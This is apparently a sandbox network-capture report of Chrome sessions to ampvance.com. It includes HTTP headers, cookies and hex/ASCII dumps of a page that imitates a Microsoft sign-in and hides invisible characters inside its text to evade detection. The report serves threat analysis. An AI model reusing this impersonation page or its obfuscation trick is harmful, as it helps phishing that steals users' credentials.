                                                      2024-03-05 13:25:04 UTC1369INData Raw: 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 38 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 35 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 32 34 34 2e 35 34 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 35 2e 32 38 33 39 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 6c 69 6e 65 2e 74 65 78 74 2d 6d 61 78 6c
                                                      Data Ascii: space:nowrap;text-overflow:ellipsis;max-height:84.5432px;max-height:5.28395rem}.text-headline.text-maxlines-2{max-height:164.5432px;max-height:10.28395rem}.text-headline.text-maxlines-3{max-height:244.5432px;max-height:15.28395rem}.text-headline.text-maxl
                                                      2024-03-05 13:25:04 UTC1369INData Raw: 2d 34 2c 68 32 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 36 2e 33 36 32 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 2e 33 39 37 36 35 72 65 6d 7d 2e 74 65 78 74 2d 74 69 74 6c 65 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 37 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 2e 33 36 33 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 2e 33 36 33 32 70 78 7d 2e 74 65 78 74 2d 74 69 74 6c 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c 68 33 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65
                                                      Data Ascii: -4,h2.text-maxlines-4{max-height:166.3624px;max-height:10.39765rem}.text-title,h3{font-size:24px;line-height:28px;font-weight:300;font-size:1.5rem;line-height:1.75rem;padding-bottom:2.3632px;padding-top:2.3632px}.text-title.text-maxlines-1,h3.text-maxline
                                                      2024-03-05 13:25:04 UTC1369INData Raw: 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 36 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 2e 30 32 32 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 2c 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 33 30 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 2e 38 39 37 37 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 2c 68 35 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 34 34 2e 33 36 33 32 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 2e 37 37 32 37 72 65 6d
                                                      Data Ascii: e:nowrap;text-overflow:ellipsis;max-height:16.3632px;max-height:1.0227rem}.text-caption.text-maxlines-2,h5.text-maxlines-2{max-height:30.3632px;max-height:1.8977rem}.text-caption.text-maxlines-3,h5.text-maxlines-3{max-height:44.3632px;max-height:2.7727rem
                                                      2024-03-05 13:25:04 UTC1369INData Raw: 30 2e 39 30 38 38 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 32 2e 35 35 36 38 72 65 6d 7d 2e 74 65 78 74 2d 62 6f 64 79 2c 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 39 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 32 32 37 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 2e 32 32 37 70 78 7d 2e 74 65 78 74 2d 62 6f 64 79 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c 70 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73
                                                      Data Ascii: 0.9088px;max-height:2.5568rem}.text-body,p{font-size:15px;line-height:20px;font-weight:400;font-size:.9375rem;line-height:1.25rem;padding-bottom:.227px;padding-top:.227px}.text-body.text-maxlines-1,p.text-maxlines-1{white-space:nowrap;text-overflow:ellips
                                                      2024-03-05 13:25:04 UTC1369INData Raw: 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 70 78 7d 62 6c 6f 63 6b 71 75 6f 74 65 7b 70 61 64 64 69 6e 67 3a 38 70 78 20 31 32 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 32 70 78 7d 2e 62 6c 6f 63 6b 71 75 6f 74 65 2d 72 65 76 65 72 73 65 2c 62 6c 6f 63 6b 71 75 6f 74 65 2e 70 75 6c 6c 2d 72 69 67 68 74 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 32 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 7d 61 64 64 72 65 73 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 32 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 66 6c 75 69 64 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74
                                                      Data Ascii: nline-block;padding-left:4px;padding-right:4px}blockquote{padding:8px 12px;margin:0 0 12px}.blockquote-reverse,blockquote.pull-right{padding-right:12px;padding-left:0;text-align:right}address{margin-bottom:12px}.container,.container-fluid{margin-right:aut
                                                      2024-03-05 13:25:04 UTC1369INData Raw: 2d 31 38 2c 2e 63 6f 6c 2d 73 6d 2d 31 38 2c 2e 63 6f 6c 2d 6d 64 2d 31 38 2c 2e 63 6f 6c 2d 6c 67 2d 31 38 2c 2e 63 6f 6c 2d 78 73 2d 31 39 2c 2e 63 6f 6c 2d 73 6d 2d 31 39 2c 2e 63 6f 6c 2d 6d 64 2d 31 39 2c 2e 63 6f 6c 2d 6c 67 2d 31 39 2c 2e 63 6f 6c 2d 78 73 2d 32 30 2c 2e 63 6f 6c 2d 73 6d 2d 32 30 2c 2e 63 6f 6c 2d 6d 64 2d 32 30 2c 2e 63 6f 6c 2d 6c 67 2d 32 30 2c 2e 63 6f 6c 2d 78 73 2d 32 31 2c 2e 63 6f 6c 2d 73 6d 2d 32 31 2c 2e 63 6f 6c 2d 6d 64 2d 32 31 2c 2e 63 6f 6c 2d 6c 67 2d 32 31 2c 2e 63 6f 6c 2d 78 73 2d 32 32 2c 2e 63 6f 6c 2d 73 6d 2d 32 32 2c 2e 63 6f 6c 2d 6d 64 2d 32 32 2c 2e 63 6f 6c 2d 6c 67 2d 32 32 2c 2e 63 6f 6c 2d 78 73 2d 32 33 2c 2e 63 6f 6c 2d 73 6d 2d 32 33 2c 2e 63 6f 6c 2d 6d 64 2d 32 33 2c 2e 63 6f 6c 2d 6c 67 2d 32
                                                      Data Ascii: -18,.col-sm-18,.col-md-18,.col-lg-18,.col-xs-19,.col-sm-19,.col-md-19,.col-lg-19,.col-xs-20,.col-sm-20,.col-md-20,.col-lg-20,.col-xs-21,.col-sm-21,.col-md-21,.col-lg-21,.col-xs-22,.col-sm-22,.col-md-22,.col-lg-22,.col-xs-23,.col-sm-23,.col-md-23,.col-lg-2


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      37192.168.2.549759104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:25:03 UTC1197OUTGET /o/3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cf01 HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
                                                      2024-03-05 13:25:04 UTC734INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:25:04 GMT
                                                      Content-Type: image/svg+xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: public, max-age=604800
                                                      expires: Tue, 12 Mar 2024 13:25:04 GMT
                                                      last-modified: Tue, 05 Mar 2024 10:40:37 GMT
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Hg2WPI7FZdHndqSVuOnwDO2DOG9A0e557tX6uxsgtGDLJ1ZY5iOPkNBqUcQnKQGuX4t9yxVXVoiuP6RoyX50laJ3512erIhFQS2NykdHZQIXNOej2%2FGmEpO1VoyEjHc%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6e0c7f9e4321-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:25:04 UTC635INData Raw: 65 34 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e
                                                      Data Ascii: e43<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.
                                                      2024-03-05 13:25:04 UTC1369INData Raw: 34 2e 39 30 38 2c 35 2e 36 34 31 2c 35 2e 36 34 31 2c 30 2c 30 2c 31 2c 31 2e 34 2d 33 2e 39 33 32 2c 35 2e 30 35 35 2c 35 2e 30 35 35 2c 30 2c 30 2c 31 2c 33 2e 39 35 35 2d 31 2e 35 34 35 2c 35 2e 34 31 34 2c 35 2e 34 31 34 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 31 36 38 2c 34 2e 34 33 31 2c 34 2e 34 33 31 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2e 33 39 76 32 2e 32 33 33 61 34 2e 37 36 33 2c 34 2e 37 36 33 2c 30 2c 30 2c 30 2d 31 2e 31 2d 2e 36 31 31 2c 33 2e 31 38 34 2c 33 2e 31 38 34 2c 30 2c 30 2c 30 2d 31 2e 31 35 2d 2e 32 31 37 2c 32 2e 39 31 39 2c 32 2e 39 31 39 2c 30 2c 30 2c 30 2d 32 2e 32 32 33 2e 39 2c 33 2e 33 37 2c 33 2e 33 37 2c 30 2c 30 2c 30 2d 2e 38 34 37 2c 32 2e 34 31 36 2c 33 2e 32 31 36 2c 33 2e 32 31 36 2c 30 2c 30 2c 30 2c 2e 38 31 33
                                                      Data Ascii: 4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813
                                                      2024-03-05 13:25:04 UTC1369INData Raw: 2c 30 2c 30 2c 30 2d 2e 33 39 2d 2e 38 31 33 2c 35 2e 37 36 38 2c 35 2e 37 36 38 2c 30 2c 30 2c 30 2d 31 2e 34 37 37 2d 2e 37 36 35 2c 34 2e 35 36 34 2c 34 2e 35 36 34 2c 30 2c 30 2c 31 2d 31 2e 38 32 39 2d 31 2e 32 31 33 2c 32 2e 36 35 35 2c 32 2e 36 35 35 2c 30 2c 30 2c 31 2d 2e 35 33 39 2d 31 2e 37 31 33 2c 32 2e 37 30 36 2c 32 2e 37 30 36 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2d 32 2e 32 41 34 2e 32 34 33 2c 34 2e 32 34 33 2c 30 2c 30 2c 31 2c 38 31 2e 35 2c 38 2e 32 35 36 61 36 2e 36 36 33 2c 36 2e 36 36 33 2c 30 2c 30 2c 31 2c 31 2e 31 36 34 2e 31 31 35 2c 35 2e 31 36 31 2c 35 2e 31 36 31 2c 30 2c 30 2c 31 2c 31 2e 30 37 38 2e 33 76 32 2e 32 31 34 61 34 2e 39 37 34 2c 34 2e 39 37 34 2c 30 2c 30 2c 30 2d 31 2e 30 37 38 2d 2e 35 32 39 2c 33 2e 36 2c 33
                                                      Data Ascii: ,0,0,0-.39-.813,5.768,5.768,0,0,0-1.477-.765,4.564,4.564,0,0,1-1.829-1.213,2.655,2.655,0,0,1-.539-1.713,2.706,2.706,0,0,1,1.063-2.2A4.243,4.243,0,0,1,81.5,8.256a6.663,6.663,0,0,1,1.164.115,5.161,5.161,0,0,1,1.078.3v2.214a4.974,4.974,0,0,0-1.078-.529,3.6,3
                                                      2024-03-05 13:25:04 UTC285INData Raw: 36 33 5a 22 20 66 69 6c 6c 3d 22 23 37 33 37 33 37 33 22 2f 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 66 32 35 30 32 32 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 37 66 62 61 30 30 22 2f 3e 3c 72 65 63 74 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 30 30 61 34 65 66 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30
                                                      Data Ascii: 63Z" fill="#737373"/><rect width="10.931" height="10.931" fill="#f25022"/><rect x="12.069" width="10.931" height="10.931" fill="#7fba00"/><rect y="12.069" width="10.931" height="10.931" fill="#00a4ef"/><rect x="12.069" y="12.069" width="10.931" height="10
                                                      2024-03-05 13:25:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      38192.168.2.549761104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:25:03 UTC553OUTGET /1 HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
                                                      2024-03-05 13:25:04 UTC734INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:25:04 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      cache-control: no-store, no-cache, must-revalidate
                                                      pragma: no-cache
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ge%2B%2BjFkAC39M4ILZrEPu7R95YSnzQAaLby0yitL8COm7jB8McjaKc0MiWSWT6SPWMnpSWw6OzE8qigNiZ2DVm15fptONEmalBVi%2B70qbRfR0bYeAlvQ6szDA2ow03gw%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6e0cbdca41e6-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:25:04 UTC635INData Raw: 37 33 36 37 0d 0a 20 20 20 20 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 33 34 38 35 65 66 31 65 64 31 36 39 64 65 64 66 37 63 37 64 63 36 32 33 37 37 37 63 36 61 38 30 36 35 65 37 31 64 33 30 33 66 31 64 33 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 53 69 67 6e 20 69 6e 20 74 6f 20 74 68 65 20 42 65 73 74 20 50 72 6f 64 75 63 74 69 76 69 74 79 20 50 72 6f 76 69 64 65 72 21 20 20 20 20 20 20 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65
                                                      Data Ascii: 7367 <html dir="ltr" class="3485ef1ed169dedf7c7dc623777c6a8065e71d303f1d3" lang="en"> <head> <title> Sign in to the Best Productivity Provider! </title> <meta http-equiv="Content-Type" content="text/html; charse
                                                      2024-03-05 13:25:04 UTC1369INData Raw: 37 37 37 63 36 61 38 30 36 35 65 37 31 64 33 30 33 66 31 64 38 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 0a 20 20 20 20 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 63 62 20 33 34 38 35 65 66 31 65 64 31 36 39 64 65 64 66 37 63 37 64 63 36 32 33 37 37 37 63 36 61 38 30 36 35 65 37 31 64 33 30 33 66 31 64 39 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 67 72 6f 75 6e 64 20 33 34 38 35 65 66 31 65 64 31 36 39 64 65 64 66 37 63 37 64 63 36 32 33 37 37 37 63 36 61 38 30 36 35 65 37 31 64
                                                      Data Ascii: 777c6a8065e71d303f1d8" rel="stylesheet"> </head> <body class="cb 3485ef1ed169dedf7c7dc623777c6a8065e71d303f1d9" style="display: block;"> <div> <div> <div class="background 3485ef1ed169dedf7c7dc623777c6a8065e71d
                                                      2024-03-05 13:25:04 UTC1369INData Raw: 6d 22 20 63 6c 61 73 73 3d 22 69 6e 6e 65 72 20 66 61 64 65 2d 69 6e 2d 6c 69 67 68 74 62 6f 78 20 33 34 38 35 65 66 31 65 64 31 36 39 64 65 64 66 37 63 37 64 63 36 32 33 37 37 37 63 36 61 38 30 36 35 65 37 31 64 33 30 33 66 31 66 36 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 69 67 68 74 62 6f 78 2d 63 6f 76 65 72 20 33 34 38 35 65 66 31 65 64 31 36 39 64 65 64 66 37 63 37 64 63 36 32 33 37 37 37 63 36 61 38 30 36 35 65 37 31 64 33 30 33 66 31 66 37 22 3e 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 72 6f 67 72 65 73 73 42 61 72 22 20 68 69 64 64 65 6e 3d 22 22 20 63 6c 61 73
                                                      Data Ascii: m" class="inner fade-in-lightbox 3485ef1ed169dedf7c7dc623777c6a8065e71d303f1f6"> <div class="lightbox-cover 3485ef1ed169dedf7c7dc623777c6a8065e71d303f1f7"> </div> <div id="progressBar" hidden="" clas
                                                      2024-03-05 13:25:04 UTC1369INData Raw: 20 20 20 20 20 20 20 20 53 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 57 3c 2f 73 70 61 6e 3e 69 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22
                                                      Data Ascii: S<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">W</span>i<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;"
                                                      2024-03-05 13:25:04 UTC1369INData Raw: 74 22 20 61 72 69 61 2d 6c 69 76 65 3d 22 61 73 73 65 72 74 69 76 65 22 3e 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 68 69 64 64 65 6e 3d 22 22 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 32 34 20 65 72 72 6f 72 20 65 78 74 2d 65 72 72 6f 72 22 20 69 64 3d 22 75 73 65 72 6e 61 6d 65 45 72 72 6f 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 45 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31
                                                      Data Ascii: t" aria-live="assertive"> </div> <div hidden="" class="col-md-24 error ext-error" id="usernameError"> E<span style="display: inline; color: rgba(26, 125, 1
                                                      2024-03-05 13:25:04 UTC1369INData Raw: 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 52 3c 2f 73 70 61 6e 3e 6c 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 52 3c 2f 73 70 61 6e 3e 69 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22
                                                      Data Ascii: isplay: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">R</span>l<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">R</span>i<span style="
